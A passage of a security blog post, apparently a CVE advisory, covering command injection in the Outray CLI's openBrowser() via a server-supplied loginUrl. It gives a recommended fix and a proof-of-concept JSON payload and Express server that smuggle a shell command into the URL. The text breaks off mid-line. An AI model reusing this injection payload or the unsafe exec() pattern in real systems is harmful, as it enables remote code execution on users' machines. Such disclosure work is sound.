[{"data":1,"prerenderedAt":1523},["Reactive",2],{"blog-post-/blogs/outray_0.1.5_os_command_injection":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":8,"date":9,"image":10,"alt":8,"ogImage":10,"tags":11,"published":14,"body":15,"_type":1515,"_id":1516,"_source":1517,"_file":1518,"_extension":1519,"sitemap":1520},"/blogs/outray_0.1.5_os_command_injection","blogs",false,"","Outray-Tunnel Outray \u003C= 0.1.5 - OS command Injection","12th Jan 2026","https://hacklab.eu.org/blogs-img/outray.png",[12,13],"CVE","Open Source",true,{"type":16,"children":17,"toc":1503},"root",[18,26,33,47,60,66,72,78,87,107,481,492,498,508,651,656,1263,1268,1320,1325,1392,1409,1418,1424,1449,1455,1497],{"type":19,"tag":20,"props":21,"children":23},"element","h2",{"id":22},"outray-tunnel-outray-015-os-command-injection",[24],{"type":25,"value":8},"text",{"type":19,"tag":27,"props":28,"children":30},"h4",{"id":29},"category-cve",[31],{"type":25,"value":32},"Category: CVE",{"type":19,"tag":27,"props":34,"children":36},{"id":35},"researcher-s33k3r-senseixenus",[37,39],{"type":25,"value":38},"Researcher: S33K3R, ",{"type":19,"tag":40,"props":41,"children":44},"a",{"href":42,"target":43},"https://github.com/SENSEiXENUS","_blank",[45],{"type":25,"value":46},"SENSEiXENUS",{"type":19,"tag":48,"props":49,"children":51},"h3",{"id":50},"source-code-github-link",[52,54],{"type":25,"value":53},"Source code: ",{"type":19,"tag":40,"props":55,"children":57},{"href":56,"target":43},"https://github.com/outray-tunnel",[58],{"type":25,"value":59},"(github link)",{"type":19,"tag":48,"props":61,"children":63},{"id":62},"tl-dr",[64],{"type":25,"value":65},"TL; DR",{"type":19,"tag":67,"props":68,"children":69},"p",{},[70],{"type":25,"value":71},"An arbitrary command injection vulnerability exists in the Outray CLI (npm package) login command due to unsafe usage of the Node.js exec function in apps/cli/src/auth.ts. 
The CLI does not validate the loginUrl value returned by the server named in OUTRAY_WEB_URL (its /api/cli/login endpoint) before interpolating it into a shell command string (open, start, or xdg-open) that is executed through Node.js exec(), which runs the string in a shell. A response whose loginUrl contains shell metacharacters (a double quote to close the quoted argument, followed by a command separator) therefore yields Remote Code Execution (RCE) with the privileges of the user who runs outray login. Exploitation requires control over that endpoint's response, for example an OUTRAY_WEB_URL pointing at an attacker-controlled server (as in the PoC below) or a compromised or impersonated backend.",{"type":19,"tag":48,"props":73,"children":75},{"id":74},"details",[76],{"type":25,"value":77},"Details",{"type":19,"tag":67,"props":79,"children":80},{},[81],{"type":19,"tag":82,"props":83,"children":84},"strong",{},[85],{"type":25,"value":86},"Root Cause:",{"type":19,"tag":67,"props":88,"children":89},{},[90,92,98,100,105],{"type":25,"value":91},"The vulnerability exists in ",{"type":19,"tag":93,"props":94,"children":95},"code",{"className":7},[96],{"type":25,"value":97},"apps/cli/src/auth.ts",{"type":25,"value":99}," in the ",{"type":19,"tag":93,"props":101,"children":102},{"className":7},[103],{"type":25,"value":104},"openBrowser()",{"type":25,"value":106}," method.",{"type":19,"tag":108,"props":109,"children":113},"pre",{"className":110,"code":111,"language":112,"meta":7,"style":7},"language-ts shiki shiki-themes dracula","openBrowser(url: string): void {\n    const platform = process.platform;\n    const command =\n      platform === \"darwin\"\n        ? `open \"${url}\"`\n        : platform === \"win32\"\n          ? 
`cmd /c start \"\" \"${url}\"`\n          : `xdg-open \"${url}\"`;\n\n    exec(command, (error) => {\n      if (error) {\n        console.log(chalk.yellow(\"⚠️  Could not open browser automatically\"));\n      }\n    });\n  }\n","ts",[114],{"type":19,"tag":93,"props":115,"children":116},{"__ignoreMap":7},[117,146,170,188,219,253,283,313,349,358,392,406,454,463,472],{"type":19,"tag":118,"props":119,"children":122},"span",{"class":120,"line":121},"line",1,[123,129,135,141],{"type":19,"tag":118,"props":124,"children":126},{"style":125},"--shiki-default:#50FA7B",[127],{"type":25,"value":128},"openBrowser",{"type":19,"tag":118,"props":130,"children":132},{"style":131},"--shiki-default:#F8F8F2",[133],{"type":25,"value":134},"(url: string): ",{"type":19,"tag":118,"props":136,"children":138},{"style":137},"--shiki-default:#FF79C6",[139],{"type":25,"value":140},"void",{"type":19,"tag":118,"props":142,"children":143},{"style":131},[144],{"type":25,"value":145}," {\n",{"type":19,"tag":118,"props":147,"children":149},{"class":120,"line":148},2,[150,155,160,165],{"type":19,"tag":118,"props":151,"children":152},{"style":137},[153],{"type":25,"value":154},"    const",{"type":19,"tag":118,"props":156,"children":157},{"style":131},[158],{"type":25,"value":159}," platform ",{"type":19,"tag":118,"props":161,"children":162},{"style":137},[163],{"type":25,"value":164},"=",{"type":19,"tag":118,"props":166,"children":167},{"style":131},[168],{"type":25,"value":169}," process.platform;\n",{"type":19,"tag":118,"props":171,"children":173},{"class":120,"line":172},3,[174,178,183],{"type":19,"tag":118,"props":175,"children":176},{"style":137},[177],{"type":25,"value":154},{"type":19,"tag":118,"props":179,"children":180},{"style":131},[181],{"type":25,"value":182}," command 
",{"type":19,"tag":118,"props":184,"children":185},{"style":137},[186],{"type":25,"value":187},"=\n",{"type":19,"tag":118,"props":189,"children":191},{"class":120,"line":190},4,[192,197,202,208,214],{"type":19,"tag":118,"props":193,"children":194},{"style":131},[195],{"type":25,"value":196},"      platform ",{"type":19,"tag":118,"props":198,"children":199},{"style":137},[200],{"type":25,"value":201},"===",{"type":19,"tag":118,"props":203,"children":205},{"style":204},"--shiki-default:#E9F284",[206],{"type":25,"value":207}," \"",{"type":19,"tag":118,"props":209,"children":211},{"style":210},"--shiki-default:#F1FA8C",[212],{"type":25,"value":213},"darwin",{"type":19,"tag":118,"props":215,"children":216},{"style":204},[217],{"type":25,"value":218},"\"\n",{"type":19,"tag":118,"props":220,"children":222},{"class":120,"line":221},5,[223,228,233,238,243,248],{"type":19,"tag":118,"props":224,"children":225},{"style":137},[226],{"type":25,"value":227},"        ?",{"type":19,"tag":118,"props":229,"children":230},{"style":210},[231],{"type":25,"value":232}," `open \"",{"type":19,"tag":118,"props":234,"children":235},{"style":137},[236],{"type":25,"value":237},"${",{"type":19,"tag":118,"props":239,"children":240},{"style":131},[241],{"type":25,"value":242},"url",{"type":19,"tag":118,"props":244,"children":245},{"style":137},[246],{"type":25,"value":247},"}",{"type":19,"tag":118,"props":249,"children":250},{"style":210},[251],{"type":25,"value":252},"\"`\n",{"type":19,"tag":118,"props":254,"children":256},{"class":120,"line":255},6,[257,262,266,270,274,279],{"type":19,"tag":118,"props":258,"children":259},{"style":137},[260],{"type":25,"value":261},"        
:",{"type":19,"tag":118,"props":263,"children":264},{"style":131},[265],{"type":25,"value":159},{"type":19,"tag":118,"props":267,"children":268},{"style":137},[269],{"type":25,"value":201},{"type":19,"tag":118,"props":271,"children":272},{"style":204},[273],{"type":25,"value":207},{"type":19,"tag":118,"props":275,"children":276},{"style":210},[277],{"type":25,"value":278},"win32",{"type":19,"tag":118,"props":280,"children":281},{"style":204},[282],{"type":25,"value":218},{"type":19,"tag":118,"props":284,"children":286},{"class":120,"line":285},7,[287,292,297,301,305,309],{"type":19,"tag":118,"props":288,"children":289},{"style":137},[290],{"type":25,"value":291},"          ?",{"type":19,"tag":118,"props":293,"children":294},{"style":210},[295],{"type":25,"value":296}," `cmd /c start \"\" \"",{"type":19,"tag":118,"props":298,"children":299},{"style":137},[300],{"type":25,"value":237},{"type":19,"tag":118,"props":302,"children":303},{"style":131},[304],{"type":25,"value":242},{"type":19,"tag":118,"props":306,"children":307},{"style":137},[308],{"type":25,"value":247},{"type":19,"tag":118,"props":310,"children":311},{"style":210},[312],{"type":25,"value":252},{"type":19,"tag":118,"props":314,"children":316},{"class":120,"line":315},8,[317,322,327,331,335,339,344],{"type":19,"tag":118,"props":318,"children":319},{"style":137},[320],{"type":25,"value":321},"          :",{"type":19,"tag":118,"props":323,"children":324},{"style":210},[325],{"type":25,"value":326}," `xdg-open 
\"",{"type":19,"tag":118,"props":328,"children":329},{"style":137},[330],{"type":25,"value":237},{"type":19,"tag":118,"props":332,"children":333},{"style":131},[334],{"type":25,"value":242},{"type":19,"tag":118,"props":336,"children":337},{"style":137},[338],{"type":25,"value":247},{"type":19,"tag":118,"props":340,"children":341},{"style":210},[342],{"type":25,"value":343},"\"`",{"type":19,"tag":118,"props":345,"children":346},{"style":131},[347],{"type":25,"value":348},";\n",{"type":19,"tag":118,"props":350,"children":352},{"class":120,"line":351},9,[353],{"type":19,"tag":118,"props":354,"children":355},{"emptyLinePlaceholder":14},[356],{"type":25,"value":357},"\n",{"type":19,"tag":118,"props":359,"children":361},{"class":120,"line":360},10,[362,367,372,378,383,388],{"type":19,"tag":118,"props":363,"children":364},{"style":125},[365],{"type":25,"value":366},"    exec",{"type":19,"tag":118,"props":368,"children":369},{"style":131},[370],{"type":25,"value":371},"(command, (",{"type":19,"tag":118,"props":373,"children":375},{"style":374},"--shiki-default:#FFB86C;--shiki-default-font-style:italic",[376],{"type":25,"value":377},"error",{"type":19,"tag":118,"props":379,"children":380},{"style":131},[381],{"type":25,"value":382},") ",{"type":19,"tag":118,"props":384,"children":385},{"style":137},[386],{"type":25,"value":387},"=>",{"type":19,"tag":118,"props":389,"children":390},{"style":131},[391],{"type":25,"value":145},{"type":19,"tag":118,"props":393,"children":395},{"class":120,"line":394},11,[396,401],{"type":19,"tag":118,"props":397,"children":398},{"style":137},[399],{"type":25,"value":400},"      if",{"type":19,"tag":118,"props":402,"children":403},{"style":131},[404],{"type":25,"value":405}," (error) {\n",{"type":19,"tag":118,"props":407,"children":409},{"class":120,"line":408},12,[410,415,420,425,430,435,440,445,449],{"type":19,"tag":118,"props":411,"children":412},{"style":131},[413],{"type":25,"value":414},"        
console.",{"type":19,"tag":118,"props":416,"children":417},{"style":125},[418],{"type":25,"value":419},"log",{"type":19,"tag":118,"props":421,"children":422},{"style":131},[423],{"type":25,"value":424},"(chalk.",{"type":19,"tag":118,"props":426,"children":427},{"style":125},[428],{"type":25,"value":429},"yellow",{"type":19,"tag":118,"props":431,"children":432},{"style":131},[433],{"type":25,"value":434},"(",{"type":19,"tag":118,"props":436,"children":437},{"style":204},[438],{"type":25,"value":439},"\"",{"type":19,"tag":118,"props":441,"children":442},{"style":210},[443],{"type":25,"value":444},"⚠️  Could not open browser automatically",{"type":19,"tag":118,"props":446,"children":447},{"style":204},[448],{"type":25,"value":439},{"type":19,"tag":118,"props":450,"children":451},{"style":131},[452],{"type":25,"value":453},"));\n",{"type":19,"tag":118,"props":455,"children":457},{"class":120,"line":456},13,[458],{"type":19,"tag":118,"props":459,"children":460},{"style":131},[461],{"type":25,"value":462},"      }\n",{"type":19,"tag":118,"props":464,"children":466},{"class":120,"line":465},14,[467],{"type":19,"tag":118,"props":468,"children":469},{"style":131},[470],{"type":25,"value":471},"    });\n",{"type":19,"tag":118,"props":473,"children":475},{"class":120,"line":474},15,[476],{"type":19,"tag":118,"props":477,"children":478},{"style":131},[479],{"type":25,"value":480},"  }\n",{"type":19,"tag":67,"props":482,"children":483},{},[484,486,490],{"type":25,"value":485},"The ",{"type":19,"tag":93,"props":487,"children":488},{"className":7},[489],{"type":25,"value":242},{"type":25,"value":491}," parameter is interpolated directly into a command string that is handed to Node.js exec(), which runs it through a shell (/bin/sh -c on macOS and Linux, cmd.exe /c on Windows). The surrounding double quotes are not an escaping mechanism: a double quote inside the URL closes the quoted argument, and a following semicolon (or any other shell separator) starts a new command. The robust fix is to avoid the shell entirely, i.e. use child_process.execFile or spawn with an argument array (for example execFile(\"xdg-open\", [url])), and to reject any loginUrl that does not parse as an http: or https: URL before opening it. That scheme check is needed regardless of how the process is spawned, because on Windows start is a cmd.exe builtin and the quoting rules of cmd.exe differ from those of a POSIX shell.",{"type":19,"tag":48,"props":493,"children":495},{"id":494},"poc-payload-vary-by-os",[496],{"type":25,"value":497},"PoC (payload varies by OS)",{"type":19,"tag":67,"props":499,"children":500},{},[501,503],{"type":25,"value":502},"Create an exploit 
server that returns this json on fetching ",{"type":19,"tag":93,"props":504,"children":505},{"className":7},[506],{"type":25,"value":507},"/api/cli/login",{"type":19,"tag":108,"props":509,"children":513},{"className":510,"code":511,"language":512,"meta":7,"style":7},"language-json shiki shiki-themes dracula","{\n  \"loginUrl\": \"https://outray2shell.lol\\\";echo $(id)>/tmp/outray-pwned\\\"\",\n  \"code\": \"anything\",\n  \"expiresIn\": 3600\n}\n","json",[514],{"type":19,"tag":93,"props":515,"children":516},{"__ignoreMap":7},[517,525,581,617,643],{"type":19,"tag":118,"props":518,"children":519},{"class":120,"line":121},[520],{"type":19,"tag":118,"props":521,"children":522},{"style":131},[523],{"type":25,"value":524},"{\n",{"type":19,"tag":118,"props":526,"children":527},{"class":120,"line":148},[528,534,540,544,549,553,558,563,568,572,576],{"type":19,"tag":118,"props":529,"children":531},{"style":530},"--shiki-default:#8BE9FE",[532],{"type":25,"value":533},"  \"",{"type":19,"tag":118,"props":535,"children":537},{"style":536},"--shiki-default:#8BE9FD",[538],{"type":25,"value":539},"loginUrl",{"type":19,"tag":118,"props":541,"children":542},{"style":530},[543],{"type":25,"value":439},{"type":19,"tag":118,"props":545,"children":546},{"style":137},[547],{"type":25,"value":548},":",{"type":19,"tag":118,"props":550,"children":551},{"style":204},[552],{"type":25,"value":207},{"type":19,"tag":118,"props":554,"children":555},{"style":210},[556],{"type":25,"value":557},"https://outray2shell.lol",{"type":19,"tag":118,"props":559,"children":560},{"style":137},[561],{"type":25,"value":562},"\\\"",{"type":19,"tag":118,"props":564,"children":565},{"style":210},[566],{"type":25,"value":567},";echo 
$(id)>/tmp/outray-pwned",{"type":19,"tag":118,"props":569,"children":570},{"style":137},[571],{"type":25,"value":562},{"type":19,"tag":118,"props":573,"children":574},{"style":204},[575],{"type":25,"value":439},{"type":19,"tag":118,"props":577,"children":578},{"style":131},[579],{"type":25,"value":580},",\n",{"type":19,"tag":118,"props":582,"children":583},{"class":120,"line":172},[584,588,592,596,600,604,609,613],{"type":19,"tag":118,"props":585,"children":586},{"style":530},[587],{"type":25,"value":533},{"type":19,"tag":118,"props":589,"children":590},{"style":536},[591],{"type":25,"value":93},{"type":19,"tag":118,"props":593,"children":594},{"style":530},[595],{"type":25,"value":439},{"type":19,"tag":118,"props":597,"children":598},{"style":137},[599],{"type":25,"value":548},{"type":19,"tag":118,"props":601,"children":602},{"style":204},[603],{"type":25,"value":207},{"type":19,"tag":118,"props":605,"children":606},{"style":210},[607],{"type":25,"value":608},"anything",{"type":19,"tag":118,"props":610,"children":611},{"style":204},[612],{"type":25,"value":439},{"type":19,"tag":118,"props":614,"children":615},{"style":131},[616],{"type":25,"value":580},{"type":19,"tag":118,"props":618,"children":619},{"class":120,"line":190},[620,624,629,633,637],{"type":19,"tag":118,"props":621,"children":622},{"style":530},[623],{"type":25,"value":533},{"type":19,"tag":118,"props":625,"children":626},{"style":536},[627],{"type":25,"value":628},"expiresIn",{"type":19,"tag":118,"props":630,"children":631},{"style":530},[632],{"type":25,"value":439},{"type":19,"tag":118,"props":634,"children":635},{"style":137},[636],{"type":25,"value":548},{"type":19,"tag":118,"props":638,"children":640},{"style":639},"--shiki-default:#BD93F9",[641],{"type":25,"value":642}," 
3600\n",{"type":19,"tag":118,"props":644,"children":645},{"class":120,"line":221},[646],{"type":19,"tag":118,"props":647,"children":648},{"style":131},[649],{"type":25,"value":650},"}\n",{"type":19,"tag":67,"props":652,"children":653},{},[654],{"type":25,"value":655},"(Using express here)",{"type":19,"tag":108,"props":657,"children":661},{"className":658,"code":659,"language":660,"meta":7,"style":7},"language-js shiki shiki-themes dracula","const express = require('express');\nconst app = express();\n\napp.use(express.json());\napp.use((req, res, next) => {\n  console.log(`${req.method} ${req.url}`);\n  next();\n});\n\napp.post('/api/cli/login', (req, res) => {\n  console.log('Login endpoint hit - sending malicious payload');\n  res.json({\n    loginUrl: 'https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"',\n    code: 'anything',\n    expiresIn: 3600\n  });\n});\n\nconst port = 3001;\napp.listen(port, '0.0.0.0', () => {\n  console.log(`Exploit Server running on http://0.0.0.0:${port}`);\n  console.log('Payload: echo $(whoami)>/tmp/outray-pwned\"');\n});\n","js",[662],{"type":19,"tag":93,"props":663,"children":664},{"__ignoreMap":7},[665,710,736,743,770,822,878,890,898,905,962,994,1011,1041,1069,1085,1094,1102,1110,1136,1180,1222,1255],{"type":19,"tag":118,"props":666,"children":667},{"class":120,"line":121},[668,673,678,682,687,691,696,701,705],{"type":19,"tag":118,"props":669,"children":670},{"style":137},[671],{"type":25,"value":672},"const",{"type":19,"tag":118,"props":674,"children":675},{"style":131},[676],{"type":25,"value":677}," express ",{"type":19,"tag":118,"props":679,"children":680},{"style":137},[681],{"type":25,"value":164},{"type":19,"tag":118,"props":683,"children":684},{"style":125},[685],{"type":25,"value":686}," 
require",{"type":19,"tag":118,"props":688,"children":689},{"style":131},[690],{"type":25,"value":434},{"type":19,"tag":118,"props":692,"children":693},{"style":204},[694],{"type":25,"value":695},"'",{"type":19,"tag":118,"props":697,"children":698},{"style":210},[699],{"type":25,"value":700},"express",{"type":19,"tag":118,"props":702,"children":703},{"style":204},[704],{"type":25,"value":695},{"type":19,"tag":118,"props":706,"children":707},{"style":131},[708],{"type":25,"value":709},");\n",{"type":19,"tag":118,"props":711,"children":712},{"class":120,"line":148},[713,717,722,726,731],{"type":19,"tag":118,"props":714,"children":715},{"style":137},[716],{"type":25,"value":672},{"type":19,"tag":118,"props":718,"children":719},{"style":131},[720],{"type":25,"value":721}," app ",{"type":19,"tag":118,"props":723,"children":724},{"style":137},[725],{"type":25,"value":164},{"type":19,"tag":118,"props":727,"children":728},{"style":125},[729],{"type":25,"value":730}," express",{"type":19,"tag":118,"props":732,"children":733},{"style":131},[734],{"type":25,"value":735},"();\n",{"type":19,"tag":118,"props":737,"children":738},{"class":120,"line":172},[739],{"type":19,"tag":118,"props":740,"children":741},{"emptyLinePlaceholder":14},[742],{"type":25,"value":357},{"type":19,"tag":118,"props":744,"children":745},{"class":120,"line":190},[746,751,756,761,765],{"type":19,"tag":118,"props":747,"children":748},{"style":131},[749],{"type":25,"value":750},"app.",{"type":19,"tag":118,"props":752,"children":753},{"style":125},[754],{"type":25,"value":755},"use",{"type":19,"tag":118,"props":757,"children":758},{"style":131},[759],{"type":25,"value":760},"(express.",{"type":19,"tag":118,"props":762,"children":763},{"style":125},[764],{"type":25,"value":512},{"type":19,"tag":118,"props":766,"children":767},{"style":131},[768],{"type":25,"value":769},"());\n",{"type":19,"tag":118,"props":771,"children":772},{"class":120,"line":221},[773,777,781,786,791,796,801,805,810,814,818],{"type":19,"tag
":118,"props":774,"children":775},{"style":131},[776],{"type":25,"value":750},{"type":19,"tag":118,"props":778,"children":779},{"style":125},[780],{"type":25,"value":755},{"type":19,"tag":118,"props":782,"children":783},{"style":131},[784],{"type":25,"value":785},"((",{"type":19,"tag":118,"props":787,"children":788},{"style":374},[789],{"type":25,"value":790},"req",{"type":19,"tag":118,"props":792,"children":793},{"style":131},[794],{"type":25,"value":795},", ",{"type":19,"tag":118,"props":797,"children":798},{"style":374},[799],{"type":25,"value":800},"res",{"type":19,"tag":118,"props":802,"children":803},{"style":131},[804],{"type":25,"value":795},{"type":19,"tag":118,"props":806,"children":807},{"style":374},[808],{"type":25,"value":809},"next",{"type":19,"tag":118,"props":811,"children":812},{"style":131},[813],{"type":25,"value":382},{"type":19,"tag":118,"props":815,"children":816},{"style":137},[817],{"type":25,"value":387},{"type":19,"tag":118,"props":819,"children":820},{"style":131},[821],{"type":25,"value":145},{"type":19,"tag":118,"props":823,"children":824},{"class":120,"line":255},[825,830,834,838,843,847,852,856,861,866,870,874],{"type":19,"tag":118,"props":826,"children":827},{"style":131},[828],{"type":25,"value":829},"  console.",{"type":19,"tag":118,"props":831,"children":832},{"style":125},[833],{"type":25,"value":419},{"type":19,"tag":118,"props":835,"children":836},{"style":131},[837],{"type":25,"value":434},{"type":19,"tag":118,"props":839,"children":840},{"style":210},[841],{"type":25,"value":842},"`",{"type":19,"tag":118,"props":844,"children":845},{"style":137},[846],{"type":25,"value":237},{"type":19,"tag":118,"props":848,"children":849},{"style":131},[850],{"type":25,"value":851},"req.method",{"type":19,"tag":118,"props":853,"children":854},{"style":137},[855],{"type":25,"value":247},{"type":19,"tag":118,"props":857,"children":858},{"style":137},[859],{"type":25,"value":860}," 
${",{"type":19,"tag":118,"props":862,"children":863},{"style":131},[864],{"type":25,"value":865},"req.url",{"type":19,"tag":118,"props":867,"children":868},{"style":137},[869],{"type":25,"value":247},{"type":19,"tag":118,"props":871,"children":872},{"style":210},[873],{"type":25,"value":842},{"type":19,"tag":118,"props":875,"children":876},{"style":131},[877],{"type":25,"value":709},{"type":19,"tag":118,"props":879,"children":880},{"class":120,"line":285},[881,886],{"type":19,"tag":118,"props":882,"children":883},{"style":125},[884],{"type":25,"value":885},"  next",{"type":19,"tag":118,"props":887,"children":888},{"style":131},[889],{"type":25,"value":735},{"type":19,"tag":118,"props":891,"children":892},{"class":120,"line":315},[893],{"type":19,"tag":118,"props":894,"children":895},{"style":131},[896],{"type":25,"value":897},"});\n",{"type":19,"tag":118,"props":899,"children":900},{"class":120,"line":351},[901],{"type":19,"tag":118,"props":902,"children":903},{"emptyLinePlaceholder":14},[904],{"type":25,"value":357},{"type":19,"tag":118,"props":906,"children":907},{"class":120,"line":360},[908,912,917,921,925,929,933,938,942,946,950,954,958],{"type":19,"tag":118,"props":909,"children":910},{"style":131},[911],{"type":25,"value":750},{"type":19,"tag":118,"props":913,"children":914},{"style":125},[915],{"type":25,"value":916},"post",{"type":19,"tag":118,"props":918,"children":919},{"style":131},[920],{"type":25,"value":434},{"type":19,"tag":118,"props":922,"children":923},{"style":204},[924],{"type":25,"value":695},{"type":19,"tag":118,"props":926,"children":927},{"style":210},[928],{"type":25,"value":507},{"type":19,"tag":118,"props":930,"children":931},{"style":204},[932],{"type":25,"value":695},{"type":19,"tag":118,"props":934,"children":935},{"style":131},[936],{"type":25,"value":937},", 
(",{"type":19,"tag":118,"props":939,"children":940},{"style":374},[941],{"type":25,"value":790},{"type":19,"tag":118,"props":943,"children":944},{"style":131},[945],{"type":25,"value":795},{"type":19,"tag":118,"props":947,"children":948},{"style":374},[949],{"type":25,"value":800},{"type":19,"tag":118,"props":951,"children":952},{"style":131},[953],{"type":25,"value":382},{"type":19,"tag":118,"props":955,"children":956},{"style":137},[957],{"type":25,"value":387},{"type":19,"tag":118,"props":959,"children":960},{"style":131},[961],{"type":25,"value":145},{"type":19,"tag":118,"props":963,"children":964},{"class":120,"line":394},[965,969,973,977,981,986,990],{"type":19,"tag":118,"props":966,"children":967},{"style":131},[968],{"type":25,"value":829},{"type":19,"tag":118,"props":970,"children":971},{"style":125},[972],{"type":25,"value":419},{"type":19,"tag":118,"props":974,"children":975},{"style":131},[976],{"type":25,"value":434},{"type":19,"tag":118,"props":978,"children":979},{"style":204},[980],{"type":25,"value":695},{"type":19,"tag":118,"props":982,"children":983},{"style":210},[984],{"type":25,"value":985},"Login endpoint hit - sending malicious payload",{"type":19,"tag":118,"props":987,"children":988},{"style":204},[989],{"type":25,"value":695},{"type":19,"tag":118,"props":991,"children":992},{"style":131},[993],{"type":25,"value":709},{"type":19,"tag":118,"props":995,"children":996},{"class":120,"line":408},[997,1002,1006],{"type":19,"tag":118,"props":998,"children":999},{"style":131},[1000],{"type":25,"value":1001},"  res.",{"type":19,"tag":118,"props":1003,"children":1004},{"style":125},[1005],{"type":25,"value":512},{"type":19,"tag":118,"props":1007,"children":1008},{"style":131},[1009],{"type":25,"value":1010},"({\n",{"type":19,"tag":118,"props":1012,"children":1013},{"class":120,"line":456},[1014,1019,1023,1028,1033,1037],{"type":19,"tag":118,"props":1015,"children":1016},{"style":131},[1017],{"type":25,"value":1018},"    
loginUrl",{"type":19,"tag":118,"props":1020,"children":1021},{"style":137},[1022],{"type":25,"value":548},{"type":19,"tag":118,"props":1024,"children":1025},{"style":204},[1026],{"type":25,"value":1027}," '",{"type":19,"tag":118,"props":1029,"children":1030},{"style":210},[1031],{"type":25,"value":1032},"https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"",{"type":19,"tag":118,"props":1034,"children":1035},{"style":204},[1036],{"type":25,"value":695},{"type":19,"tag":118,"props":1038,"children":1039},{"style":131},[1040],{"type":25,"value":580},{"type":19,"tag":118,"props":1042,"children":1043},{"class":120,"line":465},[1044,1049,1053,1057,1061,1065],{"type":19,"tag":118,"props":1045,"children":1046},{"style":131},[1047],{"type":25,"value":1048},"    code",{"type":19,"tag":118,"props":1050,"children":1051},{"style":137},[1052],{"type":25,"value":548},{"type":19,"tag":118,"props":1054,"children":1055},{"style":204},[1056],{"type":25,"value":1027},{"type":19,"tag":118,"props":1058,"children":1059},{"style":210},[1060],{"type":25,"value":608},{"type":19,"tag":118,"props":1062,"children":1063},{"style":204},[1064],{"type":25,"value":695},{"type":19,"tag":118,"props":1066,"children":1067},{"style":131},[1068],{"type":25,"value":580},{"type":19,"tag":118,"props":1070,"children":1071},{"class":120,"line":474},[1072,1077,1081],{"type":19,"tag":118,"props":1073,"children":1074},{"style":131},[1075],{"type":25,"value":1076},"    expiresIn",{"type":19,"tag":118,"props":1078,"children":1079},{"style":137},[1080],{"type":25,"value":548},{"type":19,"tag":118,"props":1082,"children":1083},{"style":639},[1084],{"type":25,"value":642},{"type":19,"tag":118,"props":1086,"children":1088},{"class":120,"line":1087},16,[1089],{"type":19,"tag":118,"props":1090,"children":1091},{"style":131},[1092],{"type":25,"value":1093},"  
});\n",{"type":19,"tag":118,"props":1095,"children":1097},{"class":120,"line":1096},17,[1098],{"type":19,"tag":118,"props":1099,"children":1100},{"style":131},[1101],{"type":25,"value":897},{"type":19,"tag":118,"props":1103,"children":1105},{"class":120,"line":1104},18,[1106],{"type":19,"tag":118,"props":1107,"children":1108},{"emptyLinePlaceholder":14},[1109],{"type":25,"value":357},{"type":19,"tag":118,"props":1111,"children":1113},{"class":120,"line":1112},19,[1114,1118,1123,1127,1132],{"type":19,"tag":118,"props":1115,"children":1116},{"style":137},[1117],{"type":25,"value":672},{"type":19,"tag":118,"props":1119,"children":1120},{"style":131},[1121],{"type":25,"value":1122}," port ",{"type":19,"tag":118,"props":1124,"children":1125},{"style":137},[1126],{"type":25,"value":164},{"type":19,"tag":118,"props":1128,"children":1129},{"style":639},[1130],{"type":25,"value":1131}," 3001",{"type":19,"tag":118,"props":1133,"children":1134},{"style":131},[1135],{"type":25,"value":348},{"type":19,"tag":118,"props":1137,"children":1139},{"class":120,"line":1138},20,[1140,1144,1149,1154,1158,1163,1167,1172,1176],{"type":19,"tag":118,"props":1141,"children":1142},{"style":131},[1143],{"type":25,"value":750},{"type":19,"tag":118,"props":1145,"children":1146},{"style":125},[1147],{"type":25,"value":1148},"listen",{"type":19,"tag":118,"props":1150,"children":1151},{"style":131},[1152],{"type":25,"value":1153},"(port, ",{"type":19,"tag":118,"props":1155,"children":1156},{"style":204},[1157],{"type":25,"value":695},{"type":19,"tag":118,"props":1159,"children":1160},{"style":210},[1161],{"type":25,"value":1162},"0.0.0.0",{"type":19,"tag":118,"props":1164,"children":1165},{"style":204},[1166],{"type":25,"value":695},{"type":19,"tag":118,"props":1168,"children":1169},{"style":131},[1170],{"type":25,"value":1171},", () 
",{"type":19,"tag":118,"props":1173,"children":1174},{"style":137},[1175],{"type":25,"value":387},{"type":19,"tag":118,"props":1177,"children":1178},{"style":131},[1179],{"type":25,"value":145},{"type":19,"tag":118,"props":1181,"children":1183},{"class":120,"line":1182},21,[1184,1188,1192,1196,1201,1205,1210,1214,1218],{"type":19,"tag":118,"props":1185,"children":1186},{"style":131},[1187],{"type":25,"value":829},{"type":19,"tag":118,"props":1189,"children":1190},{"style":125},[1191],{"type":25,"value":419},{"type":19,"tag":118,"props":1193,"children":1194},{"style":131},[1195],{"type":25,"value":434},{"type":19,"tag":118,"props":1197,"children":1198},{"style":210},[1199],{"type":25,"value":1200},"`Exploit Server running on http://0.0.0.0:",{"type":19,"tag":118,"props":1202,"children":1203},{"style":137},[1204],{"type":25,"value":237},{"type":19,"tag":118,"props":1206,"children":1207},{"style":131},[1208],{"type":25,"value":1209},"port",{"type":19,"tag":118,"props":1211,"children":1212},{"style":137},[1213],{"type":25,"value":247},{"type":19,"tag":118,"props":1215,"children":1216},{"style":210},[1217],{"type":25,"value":842},{"type":19,"tag":118,"props":1219,"children":1220},{"style":131},[1221],{"type":25,"value":709},{"type":19,"tag":118,"props":1223,"children":1225},{"class":120,"line":1224},22,[1226,1230,1234,1238,1242,1247,1251],{"type":19,"tag":118,"props":1227,"children":1228},{"style":131},[1229],{"type":25,"value":829},{"type":19,"tag":118,"props":1231,"children":1232},{"style":125},[1233],{"type":25,"value":419},{"type":19,"tag":118,"props":1235,"children":1236},{"style":131},[1237],{"type":25,"value":434},{"type":19,"tag":118,"props":1239,"children":1240},{"style":204},[1241],{"type":25,"value":695},{"type":19,"tag":118,"props":1243,"children":1244},{"style":210},[1245],{"type":25,"value":1246},"Payload: echo 
